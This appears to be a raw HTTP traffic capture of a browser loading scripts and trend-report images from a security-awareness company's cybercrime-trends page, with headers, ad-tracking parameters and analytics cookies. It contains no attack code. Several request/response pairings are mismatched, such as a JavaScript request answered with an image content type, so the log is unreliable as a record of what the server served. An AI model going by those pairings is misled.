ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ufmsmsexITNH9PpGyYs2agI0trCciTCia4eVPEXfeWj%2BYMbXUqPyZTE5eOqDX8Tl169HxhXa7HDxTvcf9f7TPRmBR%2FVqOwvlG2u%2B8ZVtVWGcIsnYaHv4EcdgpNyZcUcPDCih8anB"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
Remote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/js/aos.js?ver=1.5.95 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 124147
cf-ray: 85d1f5c849ea7785-LHR
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
age: 940562
cache-control: public, max-age=31536000, s-maxage=2592000
etag: "65cb73f4-1e673"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:51:48 GMT
vary: Accept-Encoding
cf-bgj: imgq:100,h2pri
cf-polished: origSize=124531, status=webp_bigger
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,74ab9a4fc3ef5f4d6ae776f646ea206bfbcdba6c7ae5a92d3a600d835f99db92
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZyzvD%2BxofJydS2yG0%2BcWVFBU%2BlXBIH%2F3lmbheIAwbPx6470gZQ3R6MsW1LJ0qkRZaJzDipeQZbsMHYsJJH0%2FxOo6med6pK6l7go70HYS0Y%2FZQa0LYeHRpeNk37ml7FGPAD1EYPkb"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
Remote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/js/main.js?ver=1.5.95 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=UTF-8
cf-ray: 85d1f5c849e77785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 522039
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65d8ab45-760"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Fri, 23 Feb 2024 14:27:17 GMT
vary: Accept-Encoding
cf-bgj: minify
cf-polished: origSize=1888
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,e475b11aa4e91c94550e5b243fe8dcf2614d5f39736c5c700ceb2662a466b23f
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WLWSonX87QY8l3CrtSdg9O8gYvGB7sQHZyUdygAzgjroJoAVarxmpcGFPHpxix%2F6qXLdMWIKAm%2BVcsOev6Z1dK%2FA0OvUD3ROAsnFBHBiMAaHuakeYVawf0Eez1j%2F%2Ffb1oDXoGvzR"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
Remote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/js/forms.js?ver=1.5.95 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=UTF-8
cf-ray: 85d1f5c849e57785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 522052
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65d8ab45-35e8"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Fri, 23 Feb 2024 14:27:17 GMT
vary: Accept-Encoding
cf-bgj: minify
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,e1bc8c2a63ab8192337fd9b1de562ac2d7ac8015af5c5c222423ed3cbc33f37a
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fqcuvML%2FUBDl47X4BrTMNOPsVnU%2FzRxlLRA9hSR214JZmxiOt8bLx0QzzhMZy40bUSEPHy6dSPn0X06wuoAEOT43JuC1zjLrfKMleZ9XCHpI3%2Bx%2FfW%2BfG6ndM%2FuWCuKpwuEIm88I"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_visual_Trend1-AIs-role-cyberattacks.pngmsedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/uploads/2024/02/CCT24_visual_Trend1-AIs-role-cyberattacks.png HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=UTF-8
cf-ray: 85d1f5c849e67785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 522052
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65d8ab45-32f9"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Fri, 23 Feb 2024 14:27:17 GMT
vary: Accept-Encoding
cf-bgj: minify
cf-polished: origSize=13049
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,f41e3642d7af3b68c0cde7576aedf362c95e58a3171894eeca576da13d9a387f
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cpKP4vIssj61duuAcvUHM0vbG3Tn0jFi761ixRjFURKs7GDsixTSBVGVqSwaw%2FhTe4Q78fqGOkpht7iebloNNE0udC6UlUHFxYDFTrpoPz7w4FZ6N%2BTJZvf5s75%2FHkOZ4AmRJZ08"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_visual_Trend2-new-technologies.pngmsedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/uploads/2024/02/CCT24_visual_Trend2-new-technologies.png HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 74750
cf-ray: 85d1f5c849e87785-LHR
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
age: 940562
cache-control: public, max-age=31536000, s-maxage=2592000
etag: "65cb73f3-123fe"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:51:47 GMT
vary: Accept-Encoding
cf-bgj: imgq:100,h2pri
cf-polished: status=not_needed
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,229aaf89fa390b4212c09a397e5a405308cd64d7e7db5937724a2eb59a4a96fd
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w6fsAh4TsSwReHgMdG9x9%2FA5Gq9mqeNEIML57wpQXuQ8vTDetJNEY9s9AGxj8axZNLhwXGVcgWNYiNpOi5EIWs4d8vuZ0b73IDB6hPTFKyLpbY4TV%2FHvqmNCR8eDpvcLleNha89f"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_visual_Trend3-cybercrime-as-a-service.pngmsedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/uploads/2024/02/CCT24_visual_Trend3-cybercrime-as-a-service.png HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 64551
cf-ray: 85d1f5c849eb7785-LHR
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
age: 922383
cache-control: public, max-age=31536000, s-maxage=2592000
etag: "65cb73f4-fc27"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:51:48 GMT
vary: Accept, Accept-Encoding
cf-bgj: imgq:100,h2pri
cf-polished: status=not_needed
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,a1a5534dbcc6c97da225a0efdb838c91655767e0068afb2a153c417f56d5d056
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sK3xy6xkYP8RjYEAprzQg7t%2Bv9wBayAhrUAS4Bo2kybuR05n7d9x15B6HP9eJ9ayKXIOhM9SdfnyZfDU%2BkI2s60bKWPXfwg5ccLKeAMphaiGfsmqTzLEQGNovjAVqvzqtCejtArd"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_visual_Trend4-hybrid-warfare.pngmsedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/uploads/2024/02/CCT24_visual_Trend4-hybrid-warfare.png HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 93505
cf-ray: 85d1f5c91aca7785-LHR
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
age: 922383
cache-control: public, max-age=31536000, s-maxage=2592000
etag: "65cb73f4-16d41"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:51:48 GMT
vary: Accept, Accept-Encoding
cf-bgj: imgq:100,h2pri
cf-polished: status=not_needed
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,be6cfc56931a04a5c216847d29698d1976e19d48b2274cdd48054dcbeda3892c
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l9EvzV%2BtA%2BreEQPXbjnJaXTHvyBZ1AH3nXibNJ1T0SRCpwiyqJJHC9erGE4F4017te2FqGKzxfY0Z6R6h5lz77YSMZcvYi1z%2FF36pZ6uGSSdSH6dPJE3G9Y5oywLH2gjoAi7LQBD"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_visual_Trend5-disinformation.pngmsedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/uploads/2024/02/CCT24_visual_Trend5-disinformation.png HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 99117
cf-ray: 85d1f5c91ac77785-LHR
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
age: 922383
cache-control: public, max-age=31536000, s-maxage=2592000
etag: "65cb73f4-1832d"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:51:48 GMT
vary: Accept, Accept-Encoding
cf-bgj: imgq:100,h2pri
cf-polished: status=not_needed
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,b4f00b7bda1c4dfe0edbd9cc32d1a865fe1e63b6ffcb1ff16cb576a9f07427d8
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jC5TatrKtty4sBoHfwv7PNAJAmh2tzqhySm89uwAWt6QE9yZroCS2rfWRxG8Hx41e2sy0SO2mBZDhKfDMcFuXlU%2BjZO2H42ZzUbGzjG%2Bz07TAzpCOdLnsCWWEOkP9A%2BDusHb0hrl"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_visual_Trend6-health-sector.pngmsedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/uploads/2024/02/CCT24_visual_Trend6-health-sector.png HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 28156
cf-ray: 85d1f5c91ac87785-LHR
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
age: 922383
cache-control: public, max-age=31536000, s-maxage=2592000
etag: "65cb73f4-6dfc"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:51:48 GMT
vary: Accept, Accept-Encoding
cf-bgj: imgq:100,h2pri
cf-polished: status=not_needed
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,0aad50a7c7b5b7d260e675db4a35709685f65450331579123fbe2ec39944bf47
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OYWjJmR%2BZSmm961QlV0%2B%2FryT5xnOFkPx2Y8pDhIv4MJff5d1N2YTofBKLXCOoD9xNq50FhK07Q1PBXW8qssvxN6pGnSA4ezCjxxorrH%2BuakM9OZJIaHyxyA4mIeWsAg1u5dOxXeR"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/themes/sosafe/img/icon-arrow-right-green.svgmsedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/img/icon-arrow-right-green.svg HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/sosafe-files/themes/sosafe/css/style.css?ver=1.5.95
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _pk_ref.3.88fe=%5B%22UKI_EN_Non-branded_Q12023%22%2C%22Cyber%20threat%22%2C1709220746%2C%22https%3A%2F%2Fwww.bing.com%2F%22%5D
cookie: _pk_id.3.88fe=c9715e882b41a221.1709220746.
cookie: _pk_ses.3.88fe=1
cookie: _pk_ref.4.88fe=%5B%22UKI_EN_Non-branded_Q12023%22%2C%22Cyber%20threat%22%2C1709220746%2C%22https%3A%2F%2Fwww.bing.com%2F%22%5D
cookie: _pk_id.4.88fe=5386e3a2dcbb0558.1709220746.
cookie: _pk_ses.4.88fe=1
cookie: CookieConsent={stamp:%27-1%27%2Cnecessary:true%2Cpreferences:true%2Cstatistics:true%2Cmarketing:true%2Cmethod:%27implied%27%2Cver:1%2Cutc:1709220746265%2Cregion:%27GB%27}
ResponseHTTP/2.0 200
content-type: image/svg+xml
cf-ray: 85d1f5d1deb77785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 940564
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65cb744b-bd"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:53:15 GMT
vary: Accept-Encoding
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,93f7a6387750f92e201c27b2f6242fb41bc0427a25a8a2caa3468a27af02f834
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=C8Hec0K53vexfsk2w4V2%2F27astl4ZlYMbL41VrggV9sNO9v22KizuDS%2FDFj8xmoBu4N3clUU9CZMIUjKPb8WS8q43Cu7wRzMRPFOB1rt1H3tB6v8NGc7fNOqulyoQJClJ3x7JNnM"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
Remote address:162.159.135.42:443RequestGET /sosafe-files/uploads/2023/12/cropped-favicon-32x32.png HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _pk_ref.3.88fe=%5B%22UKI_EN_Non-branded_Q12023%22%2C%22Cyber%20threat%22%2C1709220746%2C%22https%3A%2F%2Fwww.bing.com%2F%22%5D
cookie: _pk_id.3.88fe=c9715e882b41a221.1709220746.
cookie: _pk_ses.3.88fe=1
cookie: _pk_ref.4.88fe=%5B%22UKI_EN_Non-branded_Q12023%22%2C%22Cyber%20threat%22%2C1709220746%2C%22https%3A%2F%2Fwww.bing.com%2F%22%5D
cookie: _pk_id.4.88fe=5386e3a2dcbb0558.1709220746.
cookie: _pk_ses.4.88fe=1
cookie: CookieConsent={stamp:%27-1%27%2Cnecessary:true%2Cpreferences:true%2Cstatistics:true%2Cmarketing:true%2Cmethod:%27implied%27%2Cver:1%2Cutc:1709220746265%2Cregion:%27GB%27}
ResponseHTTP/2.0 200
content-type: image/png
content-length: 876
cf-ray: 85d1f5d6ff577785-LHR
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
age: 1118693
cache-control: public, max-age=31536000, s-maxage=2592000
etag: "65cb73f3-456"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:51:47 GMT
vary: Accept, Accept-Encoding
cf-bgj: imgq:100,h2pri
cf-polished: origSize=1110
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,845a55478ae380e7f114e1d3f5d9be94370dfadfd19fac3a77dbed88d8fc37ed
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
